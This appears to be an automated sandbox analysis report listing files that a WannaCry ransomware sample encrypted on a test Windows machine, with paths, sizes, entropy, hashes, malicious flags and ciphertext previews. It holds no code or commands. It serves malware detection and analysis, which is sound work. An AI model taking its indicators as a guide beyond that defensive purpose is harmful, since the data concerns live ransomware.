                                                  SHA-256:951AE5163ABCCEE09FEFD778C4DBF411E5A7193E89B9B6798EE24512E9DA5CB8
                                                  SHA-512:F891E39951170B75802697D2C8AFE268CFD803E4E2A680BCA71F48B55A200AB4D6F0AD1892E21E10EEAD6973B988445705370350A0245028BEF034DC8396A12C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.........k.p.....x.|....w........%E....nr.0.g...2..Vb..V}4=.v..... U....^..Q...FC.Y.A.H..?.....+....SE........W....P...R..s..N.z.....3.x6U.D>..ot.*V......".>....36....m...Vd..F......-....}0x.........*...,=...l.O.x0.``...[..G....k..F.T.|2.........@........6VC.r..v+..i..6w....#v...4^......t.7...J.L.Awm..4...a..C<#.*..W[.>.f.$....Vh..N..%.p,..rtm*.%..@...BB.. .n...mw."o.w9....a...z...p.0"...?i.3|.N.. ...6.b..c.._6.~.../'..4.....f.DM.`$....R.K|m.u<....f..`..=V...5..`Q....a.oE..1.w.....p.m....+-T.....v0.j........lL%,T4f...+.!*/..R...([.l9...(y..zJA=:.*./.Q.._O...m.....mJ.~..Q...b..hu$..HPa....v\H.......x~.oUg.L.......E...J+...$i.lQ.P.g.hH.A.4...-..k..E.m..)..w.i.t...HT.......:..b....*....NR..)z.qtB\.W..........7.r..`....C.....k.....wbU..|.5~........x}.e.cSU...Xp..Y%.. u..39...7_.~.:...B.X...J.#...F.....#...zF..NT6..a...)'p..L@.....i-.....t.Xt8.xL.2...q+.*KW...P...2.R{...=.Yf...5.?;.@L.F^.T..a3...NN.<../.W.....B.-..#q.uF...E.....d5..+vo.l..

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.3.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):16664
                                                  Entropy (8bit):7.987609891238008
                                                  Encrypted:false
                                                  SSDEEP:384:cqFQR58z2DNS5QP8kaAkai8zX/uQ7UnZpOXeVQIiL:cqMm2DqdaXzX2Q7Un2OKl
                                                  MD5:7FE3758AA2BD622A5CC9E0FF23A29463
                                                  SHA1:2C1FE85FA5C3BB72720F918BB1873D5E183939D1
                                                  SHA-256:974645BE36AA8A80DCFBF2BA750587DD50609969BD3C861E2CCA298ACE089852
                                                  SHA-512:F78EAC81A0EB6765487F6FC71A5B36197FFEAF770267EDAFDDFD10B9987B5815712712494BBCF9D700660E68C18BCD9C5A98BC8C46886A760D0F14D9B701090F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....|]..PB..^.p..{=Y...#..[lN.cy.....E..R....~.:..u......D.>.n...^YxD.lt.`B..b..2?...#:........i...i...(..4&..-.<.EK..9....0"..<.......j.*^;^..(.w.......T? .c5)+.\"O.\......@$.j\.F.d.......^..x..=lJ8.7........Ad....OSf/Q........8\_O?.?....8.........@............*S.mf.:.B6(.E8q...2..+a..RS8.g+.H...(.......@.;..u.......|..B..\.c.....N.\..].R.d......[........A...u...3J..^...rdH4.}r........E._..YK..k..z......{.m........v......6....7m)........t*;|...?.X...#.......f...h|.N|zbS.89@.j.....l....+SF.S.\T8.....Yv.....a....e.(.0V....;.C... ...M.t'..,%ZPN.dwZ.l.K*.o..!....'7.......aV.1.../.Gm.dY......jy..{%.N.B..{x^.M.b....QWu.6..q+=57t.m39.2.iTq\.....2*NF[.c.9.5.1......n".N/...Kn\j.X......4..&....z..+.%pz...H....T.gQi........u...^.%.t..L../.m..u...Ir._.5/"D...:..hRw.:...r..~-...J|.........'9G.....x..o.....$..-.]+}..!....~.bg.4..i)?[1n..M......T.zrZ.(:.W ........11.8TzLm.:.saO.....&t"..?6...9.......*=0.u.B..*.(?'_.5._Ko..7?.S..`q.tz.O...%...s...s

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3075AAB0-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):424152
                                                  Entropy (8bit):7.999569867414532
                                                  Encrypted:true
                                                  SSDEEP:6144:9gU3Xs9yQcG8ZcBGm4AtEyBYGTPjlRbJh3MO7aFdUV/QqmxJjKrHKXipKz6Zh:9gUH0wVUvf7bJhhJVQqIOHXKz6Zh
                                                  MD5:405C3CF7102046D0450C82D8BF96D864
                                                  SHA1:FABDEEB8B80BB1FAEBC9340B3B1C95491D3949D0
                                                  SHA-256:ABD6629F75D033567DB9B6DB6674A42B3C8060E68E5F58C4ED51321329899134
                                                  SHA-512:64882214C02D6B68F175374BA305A3ECF12F1CE5217D2CDA4B9F2C207D8A67A27A684421CB7B1DBE203EFAC0DBE9D7073324EC75E920C4933B18E6B6FDFD3346
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!..............o...S....8.....[.ww......6c....P.i....#.....}....RL.b..U...o...*.C..[./x...1..]h.b:...Kg5.k.Q)y.a...,?f...Y.^...i..VY.x..u>....s..R.....wjC.Z....l.#?n..<..;..N..f......2......[.+)...F.B.....wn.ot...jA.....4z..~...MU.eT^u..C*..+*>.....w......E.EkU4a..(.Q.......H;..Y.u...$.3.D......W..B...4..E./....&.n.!...............K....9..>.s.h..2.e.s....!V.+s.S..>..&.$.....7..IL\..!..z...(.m!\....:....l=^4s.4..p<......-?7Q.A7+.Z ....c..=..8&....y..%`.....V1QA.G...g.-.7D..G.[..vm......3y?.Y..D.....4.M.U.0....!...=.,$KE.B.C..{.....B'..mO#.=..z.....).Ar.RI7.H.. .Y.....|.2...{>...YNv|.(.=.v..T...r.1^.&c..S .4.=.R}.crC....L..d....v....r..d.`.9...P.0..?.l...G.F.T7.M..}..._= ...n...T......h.3!......z.O.PC{.a........|_........tl.z...LS.<7yi...[...........[..s.'O...i........k......]~+O...j"nG@.:q..m.....d..;.m..<?..\..t+z...:.G+YX.M...@!Qt.7xhz .{.(.6..SOU.IZ..}}.W..SY*.....x.k(.....>U.@.R'._.....fdN..dW0..=....7.......N..T.~r.....

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002a.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):100984
                                                  Entropy (8bit):7.998244260718336
                                                  Encrypted:true
                                                  SSDEEP:1536:BjY8mBhiZ5EfBdgTIvx7S7oD3Tf/d9vvZOy8DqvGD3959BuK9lPC9UUM7Sf6oHQI:68mB0EUkJSAbd9nZX8mvcliUUffcQ
                                                  MD5:B369554685D07C227F7DB860792A83E1
                                                  SHA1:C0ACE2E59B09C0D533B274ABB5FC77E7A6CEE9F2
                                                  SHA-256:D57CB8CF831EF1AD8F3050259DA39DE16FE9396CABC4FC329B4E2243B2ABAA5A
                                                  SHA-512:C33F3C10638A1D436086895B042A74B80F6EA7047CAE11C33263B6D56C6588FFC6C4AC374674889D0437A4FABCB7A1A631BEC8D189F0A00C19D964D248374E6F
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....:...;z....+.....NW...VA 3g.".H/..qE..TVJ...U.{..G..8qpq.P....0..|.7.jc..Q....ujbI.(....<Q....q.....t....qF..WH\q]R.N. ...O....mj.>0..9.d.F.B....5.s..AX....j4...e.q..]P..#}.......-e.cK.!....Y.uG..a.3..L.8..>.......f.T..0,....5D.@...W#..&....`.......UY.J........!].G..Ex..!ex.Ou.*Tr....j............L....U.......C..Ss..\.z!p^g..).H.....D........TI...d.Q.....D.oA.>h.b^.5..Z...dq.F.D..?=.W.%...zR..V.%...\....x.+M.......J..9..[c...Q.3~Sx.C..p.u*...Y.^..S.Az..3..%....Uy.o....?..#..<l.p...g..[5..w..#.S..Q..b..\..f.../.W.kb.Xs......P...........)..]].bo..5..%.."....T>...'.V....xV.W.....Y-h...'...N|.r...>CI}..%.Z.[}..H.g..;...d.c.xEO...Z.....<.M..r..I.[@=...#"......J.s...&.>U.\9'eQD.2%.(.....t.....~..e..z..*aH......g....bd..H......S.%....o;..9a.S\.L$"Os..W..s..%.L.WU..>...fB..^].O?.?Gc.\....J^N,..!0....!S..'......q|a..X^..U..{.....U...yjVB.I..*9w.Y..../....[..#...cT\.,.{.ke...w.x.~*j.#~f.........Ad..1.i....%.^@....5..|...n.....[8........O..

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):75576
                                                  Entropy (8bit):7.997299618721468
                                                  Encrypted:true
                                                  SSDEEP:1536:gKpjZH82hCoAtPz44EDw9KzhrcyVgh06KrQwFgqbqaytWnkxIt1MpsXAvCn:g4pmBwFoyehsrhytcAsXAg
                                                  MD5:B642A18EADE98D5CBC7799620C63113B
                                                  SHA1:ED86E0CD23A74585E7C92B805198CE0E3511FB40
                                                  SHA-256:277DCA165D0789CCC986B96F356748BDA13255B13873D68BBB4928FA3F99D80A
                                                  SHA-512:A9469E29F1525539C2C4F6104492D9A9D7DD4589B474953504365735FD08B11F54647E74CEF47951C31C6A56DF8002AB53A3EA3EF2FBB036B1DEBDAD85331147
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....&^....p.....}+f`..<...._......l....kk....r....h.......K.\E..(*...]..b..B...D....6I......m.._*1[..)HK...|.M@..\5...n`.8.l.^......@.....hz.4..8H..wf......F.....G..t.3.8.ui=)..#.].......Y...\.0..[.7....wh...f..5.Co...wN..9Q;.<J......~.._qk...2.....&........_...=!.....H5.r..,...x....\....5.....+zYp].ZeZ..+;Z.....+[.O..X.mpf...`....Z..h....+g...e...J..j.3."...v...../.#...... ..1 .Z.q>..~".|/v.o.`.K.._.Q_...9f..N}e..Q..)91<m.n ...3.G.M..3.y....R}...M<.Z.:.G...C........ R......[..........):z.....ta6.7...tMRV...zD........B>V]h,N.^.".K.....^.?.;.x...0.]D]c.x.z.!....[x..|bLBs..:.,w.........F. '. I...z..w].V..W.,j..&....OG..82....$..u.j".z..S.S>....m#5..b.._?...lT..=....Y.~..VB.j..../.......t.......9...).X.7z...4.... x.z.b.i.....T*T|......G..}}...clo.:.. ......D...j...(U...:.9.M...y......}u....N.aj$."....Q.....q..D...f.......+.w..P........#..h..24...&Y.2..z....I.Z./A.F.....s......p.....1....Q...K.g5...\..ws#7....u..7}.....h..|[.

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):75352
                                                  Entropy (8bit):7.997489532766033
                                                  Encrypted:true
                                                  SSDEEP:1536:QVLSQ87ZAwE0MZacVLrCHCf9gtrJLzaKjtTo9ghqzY9gjNKPbcAdlRs9Zml:aubZzMZaBHCf9gpJLzFHq892NKjcOlOO
                                                  MD5:2EA4B5CBC70613254BFAE56DEAAA9AA9
                                                  SHA1:7DD58326F40CB9AB87B2189DA77CDB04C4212B2E
                                                  SHA-256:830B43357452022817DAA455E4D7B514550A1C194F7F531833F1C8DC41798411
                                                  SHA-512:15E22C7CE246F270C02361E0C196072300D0AFE10A499FE56D08BCC547981AB2AC9A67BAD26F32A9742AE540D6FC38E6F1C7CC5B0468CEAC2B437FD54AD117BD
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!........=%@.n...m......C.L.........yh..X....&..^a.Q...Y..?..-*..;|...{.......9.).?Rv...z)..0...{!5..t..>.t.9D....(......\zB..%.g.....zY...d .>.=E...z/C....VI....7...H.[.e..S3....nC.J..Y....r.].i...B.5.....a..FNvu...Cf.].}"h..w.\....=...2.. ........8%........^.mi...Q....d.O....T._..R....'.R.`...l....'.W...B...$=.j..bf..kY#g...gu_;X..L0.~..y.A?+...#.!..4..'..v...q7Q.......ln......E..K^A}.ut.....].iDKv.C....Q.5.B...n;.h......RM_.th.(.>...7\.$..'..T|..L.}+...)97b.A...,~.O..8....jK.n...) ..bl.2l.?...!^.1.-]..g./S.B]7xV......;...iv.l...a.5.o[...6...w'.......q.W...[M...J..W\r.....u.......z.}.F../.H....M..I.]..\.$6.xX....x....Am;..m6%b&..CI..1^.......k....%....[V....H.\w....c...I..(..O5....1.e.>......Zm.JG[8d.VJ'..C#.=9!.{ji...RK.....f)...)R..O.k...W.?..Gr6.gW.Q...V.M.S?..`Ra.u.eO.l.{.7....&.j..a..S.;."...'&H...... K!X......4......&.J..F...]......m.19.|R........<....F.....t...].y.a...u..-uWqj...9..N....t.&.d.....i9.@.A.F....._.

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.173477892175478
                                                  Encrypted:false
                                                  SSDEEP:6:bkEEU9jzhOO9MQCkFCPWZR7TRGChoiXU0MP4wgUoTPpMHDFD:bkEE+IOqQ/CKR7oCCXP4VxiHZD
                                                  MD5:5D819168839828BAE651304A77A4726B
                                                  SHA1:7201EFB68E7F67BD016A258EE94D4F4362D7D6F3
                                                  SHA-256:FFEA2FBB8544CC56C12A58C9F842757388D263B2D8614D63696A5ABBB81E4E9B
                                                  SHA-512:51F7D4AB9CC8B93CD51F7CEF6974B73AB9E14BD738061B6119B1E2E65510655733E30168E01132965380C373E6765F02F07732CCA5665CE1639FFA438E86BCCE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......mi..: )J...@.q.9..=:9.....}|.r6.[..ow3od.G...6k.(;Yf...2..J......s(9.z.e..f.3Z.r..Ow*...8.z....vkfR....!^......-..p..D..oj..../,..d.......sG..@p...._9....K...M.E4...Y0.f;.1.G.k..t..t...D....gd.........O...4...I..A.J..._.o..E.~U...^.....ar....l............|l.d.c....d...1P*)..[.X. ..l....

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1048856
                                                  Entropy (8bit):7.999812396639101
                                                  Encrypted:true
                                                  SSDEEP:24576:OyV45c291oQVxkt+LeIeNmGW0aWb/jEC4KT/8O5AOW:ZVm9z+8w7WKIr2b54
                                                  MD5:07A527ACEA90EDE58C853E177D9AEE99
                                                  SHA1:BAD34CA9192FF2DF3639F1114711BAC7BA3890F9
                                                  SHA-256:E30F5DBD30DCF7E16251E7FF0A1EC75AEC010E4B7067480C6C22AE4DE5DF02B9
                                                  SHA-512:CCF345C7157D643EDCD179D14780F1973D053970F4CA31800922B1EC03C05D5D157FF94B8A6302FF1439354C64D5C895C8333DCA4D4EA273BFE69AE66599C6FE
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....G..&.=...A.y.H.)!.K.L..f..X...a..f....3..N.._n.w}.<......J....^j.s.y{S.$.B.v....r... >.D....R..+......J|p..8..Z...i...#............BH.@..z*[.;.*[.|.*.B .C..N.. .P....}b]...g4KB/....o{..=J...g.......n|4G5..............}..C.*1[...4.hlY.v..~.a..................%..$|..7.}....(.+........"^.0...S.Kr.z...(....Rh.X&.E...B.....No.Gn.....^..R..'!..$:So......".Rt{.B.M...W.T.+.......~......;...M.W.N..;........z9.k{i)sn.(...M%\..e.9...S...l.H/...2|...o....i.+1a.....1...c.!.;...7.#.M.~.....v...g./}pO.K......".?H...v.Hg......`.5.....y%@..._W...,.d@X.y......s..a....W4.........wrf=m.......+Y>!..M.:.C....f.D.x.af..gNx.^..H.0....fny.b.c4...= ...X...I.OB ,...[c..^..=....;N,....K#..k./.3x.(...V;..Gh,w..{...........}.7EP.cx3.n.....f2+..|.v%.'.^.....l>....z......`.<.9.].....|).y.4#Z.Xa.B.....i.cWw.....`.....C.l|;....t..9.Q.!k*..>A....:..K..!..kv.r...`P.C~..BH......B*t.)..u.|...y...,.3\.3W,Z9..h[.{..0l.."...A.[~.I%.M\....,>v..zm.\$.r.k......rmV,>

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.190633006183709
                                                  Encrypted:false
                                                  SSDEEP:6:bkElx5kDi6bR/rRMkv0ELxiJVQsGF2rciwzSNSjf2WaMbY1L7P:bkELeDhbtrRMcvibK0ci4SNSjfDaV7P
                                                  MD5:89EBD0EE811F105D7ADE5BE028B265E7
                                                  SHA1:2724E8994CCEB73F57B00A6549C9EC1996C398C4
                                                  SHA-256:2BF206A0AFB895D8F79112FB34FCF6A7FF986C6925F2E439D2418A9EB0C957E6
                                                  SHA-512:0E32D48F0032E0463923B9666200A8E90B5BF03E565E5CBE633EA218A7BC9CCB737E746B50CA02F6B19E8A172E1CD2D8D76780E9434B1F1D55BA96C266E2F3F0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!..... .N.../...,]l..o..\]+...G.PJ>......6.;.[.%.7.IV....e...6ewnhdG..IH..c.....\.~{.....d.1...... .K.wLs.4...............8|.R..|.DOv.....R.<..c......<....U.l.5....et.[;..a)...6.{..8.d..U...sT7..D.-2..K{..n..:9.....O8#.^%.{...{)Z.V>i.8..q9.~I...gwd...............4.HR...D..`.?.?...(?.j.2.Q.SQ..

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5243160
                                                  Entropy (8bit):7.999962358427426
                                                  Encrypted:true
                                                  SSDEEP:98304:CRKLCBCWjGJCMGlECQ1nYZb4oJ3VWKt/9y5LrJ/wuT9wEzGjLBwtwn:CgCByGlhQ1Zoic9aLdwo9H6Iwn
                                                  MD5:B768ADE98E7800EDB0FC71BF0E37E33F
                                                  SHA1:D66EC28A2A3606E72E6F57749505C60069924F4A
                                                  SHA-256:131FCE3BE1ED551D84429B0BEFA32DE2BBC15912A073383E8A05A63655193261
                                                  SHA-512:4FB9021E038CCC8FB5502EE37BE113EDD67979E782AF1264D9361D203DFE0E2D11623B80244880D1F3E5B9E420A15D92469533EDAFF07A6780E6318EDBC94D7E
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....:j...........A......-.GWz..%..U71z`..@.Ba4..q[...]U.u.....G.,cm.d..-'.L........D...zO.U..f................J...O....W.....i...R`...q.9.{] g...%.\bz..bg...(...,.Ye...A.....^$(.F.....).&f.Z8X.D...,;.6.{...".....k........k......\....&.............P.......].U.S....<!..Fo..Z47...'QQ.~....XBh1..Z.l.w.....2'.sg.$..%m*.....2.jT....).F;.{ .g....W.....V\a.R...l'{.....d...^a..U.j8... ...Q...:..3A.b`......p....._D...b..F...:....#.. .q...`.......W....._.4.O...dw..v6.v.=.d4..........E.T."...0.^J.',=.....L..G.....Q.=..V~...X..$^F2zOlO.....\.`."'f.^...!vo....\..ds.4V.%.l.[z...!..^.J.k~...^...,.y.!.........c&.....BgBI........B.{x.G.&....V..vL}.c.....}}...3z+.U:(..<..h.....`..u@QvTV...rq..5]..W.`.o...a]o<|H..gz.6-..I5.N.b...o.$.(HRQ.V.II.^.}..K.{.. ........\S.B....K..]. u/..G..FE...X..r.{...+.Y.\.....|.[I..%`sO..'..o."5.z...3lu}\....t.C.c*e....*...&...&..w.W............0.....}.^....r.e-....&/...Q....'..g...2......4&.(.f..Gy..F.Gia;....")

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.207194786323538
                                                  Encrypted:false
                                                  SSDEEP:6:bkEXcI+v00kJeGZ9Ia8ZfG/yPStKRgBxyKqAuN47QozW/0:bkEXcI+c79ZZ0G8UnWLu72/0
                                                  MD5:6F4C68C1D1CDCEC27C6D2A8AAFE6D238
                                                  SHA1:818B2ED209954A56318AE6A50666E729BA6295CF
                                                  SHA-256:F0929773060A0FF1F0CB0D3BD18B3770F9277E6A6598F5077CB736DB468C0CCD
                                                  SHA-512:37726C5EE7690E62A8C2F5F87D20BF493703CD46E39AEDE7ECB33356F7E0DBF092D2A289921DB1B0040A6DABC1595435EF4D0FAE34B5883CE6BF2C7D36D91782
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!...........w.f..O..,P..D....i-..Bo6!.Z.v.....W...72...u...Ni.......V..:y....s..|......t^...dT......R..Z....}.X..Rsls#..._>..z...Ft+!...6.2=.76.c xD.....~(9.L...FsT.5....I.c.....y.:..:p...d.d.L...:.......a#....`.b....X.q......E-b=..a....oL.&..J....Q.............. 0...;...4q.W..C!_...t.2nq...

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2097432
                                                  Entropy (8bit):7.999919930034065
                                                  Encrypted:true
                                                  SSDEEP:49152:/2Njrixcvq15iyQbVVGHHhzz+udwCAjw//X/goDWtv9q80:CrixcvyzQbKHhzz+uBAj0/bQ9qL
                                                  MD5:BAED012CE1A793116390F2E95B400BA0
                                                  SHA1:8BDDF9541F45CF3593C2D459AB00F467C06CF9CC
                                                  SHA-256:44ED77CC2E2ABB431FF21034AF2AE34D2D858212DD46F8CB30A559DFC945A3BE
                                                  SHA-512:2E5668C28B88A67E70094F09048AD10D6AB12566F127A37305575579CE82A1FBD098A0BEB230CDAF11AC0000D35218651386CB34BC5F3BA1DECF8838797C853B
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!........JWL.[q..U?.....b5..J.:g.0q.......5..m...8.d1D.<2...Q.9<+..%..u...d,e.3d....m.`. C...J...>.jM,..[.e.......%..Q..........Y.I.Q'PE.a.No.WF..%8.C-.."D..y3{<&.k.,O..{.b.."............\.V".ZaV....q.d...Z.......wp...u.~...9..5..!.3{.f.(7en.... ...... ......I..k'............B.......PE..B.e.a..v.}.../Na..^....0.e..SK7V.0..4i..$..|..U(.#..(..0.0.`1.5...}.....\`......:..].............B.q2.....KO{..Nl........6..>o:jd....1.Y9En....!.c!..].....l...7{....xT....0..{......A`..D.U;..[.;)z.2..&.|.i>.r......wM..1..U..z....J...=..~...t.X.'..4.J..VH./.\...0wX.|.:.....#...M0....yWgO..O..8i......|..Jf....S%.7...5p.;.J...jb<8*..g>..q.5......%.E1...|h0jm.s..g..@...v...7.]......f..U.....1.........!8...3...]..a.;V..r(...qJ.g.Z_PN.d...:bS...b`>x..g7.$.V.6.7....t...(..|q..a.A4c.KA....+.2...8......u."dE../..ih.....1..FN..b.......r...>....J.O..b...l+ ...|r?Ny.j#.$.8wRV. &g.>.b*.a..dI.0D.....*.\....3)p9......J.X.P.h..8\[..0.s.u.tP..Vp......l....;.

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):3146008
                                                  Entropy (8bit):7.999944011274961
                                                  Encrypted:true
                                                  SSDEEP:49152:qh2N4Hzb40FMK8rk81vK0y1bw//yTq6z4SCli6cKkritwGoG/SpU5Fv:KTcXb1Y18STxESCNTCuUmFv
                                                  MD5:327C4B33255D4545BB5C1DFE829D6BEE
                                                  SHA1:13DF471F90D10BA246D000455E7302E0689570E1
                                                  SHA-256:A745A01297B50E2B04141D6A55FD5ABAD72EB002DC46DCE9CC40640E5D8DEFD7
                                                  SHA-512:AAEDEDC81D4E2D45AB945D438B44C35BEC63A7817F7208B6D153ADBABB2F7A65803D4B521E0E19CD2989316A43C6FF660F430D58435277262C8EB71568AA28D4
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....[......&E'.. c3...Q./P.....4..q@..n..Y.G......_.H...c...7N..].WcK.8.:u..wX1....)...M'}.......6%......."...k..|.sl9Z....M\..}..e..g....W=A.'D.!...H..[.".p./AeOs?............../R.!......A..l..5....&.C.f...V....iE"W....s.`.8.^.....y..%...1.{........0.............v... .F....T.zB.C.h..4;.m...T....i.diP"3&..V..l.r.....$u..........{.-......P...Fp..O..b..{......n......Tt....c......1.A."... ...; ....-..w%...h<.>C<.........h......>..!.)...D..:...J.;.|.{......8`.....UW.!+.$.(...<..w..d2..=...M@XP._G.....|.8...|q...2.....T.m..m?|..).......d.#..?.6.q+..J .x.G.!Y....~...@^.k...%Fi..d..6.........\......?..:....B.j..F.z8wQ^k.O...Z.,.;F..2....-...QD..,0....yjl...@.....""dH....2..z...k....A3...K....U..N.a.QRS....!...&.O05/.z......8...Y.nm.D.. K.h1.v.ZC.+v.cY...].....\....UN...s..J.....J..1...."...g.........4D.=..S...?.7..../'...O.?.5..5.+-.a........eg..71......~.p...A.g.S.h.x0D.w../..&t.M..6M..@x[.S....<..>..\...I.E.._.R8.;..b.;..l..A..

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.19823969812011
                                                  Encrypted:false
                                                  SSDEEP:6:bkEBbEY/XE5AW2DC6sRi08gTwIMrtKrV4h9if/MojNm+u4pO:bkERE5z2+68i08gznV4hAHMoIgO
                                                  MD5:7CFA5D8B0153B5BFD669DA2A8A3F0CD2
                                                  SHA1:30C327A80C19F17C1A3E7EFA0F0BF5A973D0F8AC
                                                  SHA-256:CA7390B7D87C2B3C9CCE48CF45E50585888217ABD5DA725ACEA7A769F4299C82
                                                  SHA-512:99C2CF399A13E6BF1E2E908D6A5C381DE8A0B4C506FF9D4B78C363695066CC0006D86CD998137AF0FB9A5A6D2B790C45AA8141359160E22E83E90B78ACE4DBE7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....B.......Vz'..j.H.k/f..q.^..7..U.;.4].Fyd..;.....3.A.Y..3../....B' .Ln$e.s.Z._W.....g..,y.SDJ 1..q...Sz..".l.v.t..!.".H.j.}..xI............'.n.k..../.|..u.G....0Y)..^U..Q^....w..z!7.v.....+.../.th-`>.o....:BQ#......uV.b*.....nuL....d...$...............r..W6.|....S..Chv...g.L....

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.241600375677764
                                                  Encrypted:false
                                                  SSDEEP:6:bkEcLb5zG7/I3cb8+FpBiSPiP/6hy3w3Sm2gi03Gj2AviAjjQeNvUzoak5qC:bkEcHFGM388+Fv1i68nBgwixeicakMC
                                                  MD5:CDAF1C53CFD7B26A928E0A581E527C44
                                                  SHA1:350468FD1862CF7F8555CEA3E9C5708B462BCBFA
                                                  SHA-256:51FBAB69D8C1356C06DCFA74E4EC90ABB3C6FAC3897FE497DDB3763D28FB4AA7
                                                  SHA-512:C12ED89BF52BEEA3C1F1EE796A5DDFE24C9FBDF91A9055C28602E8A5AF2546F2C0899820AD1A303A2800CF57EAD1896D57EDF2963E011752F954325B0D1F82B5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!...._Q.67y.M(.t..w;e..r?.q.4._.v.e..jq.....1.oO....."....f........ #....O..].Q.p...b>C.m. Z....LF....j+...2..-s.c4qsc..if...R`.q.....f..&..B.,.s.?...g...G7.g...*x.b.....S.EX..J..d.'...K...B{...]k..T...X...%..o....9.....u{.dDm.-..=...cC..J.i.o./[............D.g....../ZR.q...n.k./q..1..

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):312
                                                  Entropy (8bit):7.232338558767144
                                                  Encrypted:false
                                                  SSDEEP:6:bkEx1ZkISV4tBe+Cx5zDQ9Jrhpm/l4d8k2xzXLxN2nZwxq6mQG7:bkE2m3C5HQrbmk8kQXlNULt1
                                                  MD5:E25962CFC2B26DEA0B1F00E61E7ED449
                                                  SHA1:84F0D3A550D212BD83CB36E18C72B3D9AAF4FA17
                                                  SHA-256:70D63A9746997581D0347DB840D3202EB4E8BCDB5F4B76EBC5E959156CAAF973
                                                  SHA-512:EFAADD0F0F0CCB23358EF327FADEC04C56C48EDB5D9AACAAC1FB78459852C52E7AFFF0D0B26BCF92A7CB264016C1A0ED5600F129411D8C27CDC7C91C5A802257
                                                  Malicious:false
                                                  Reputation:unknown
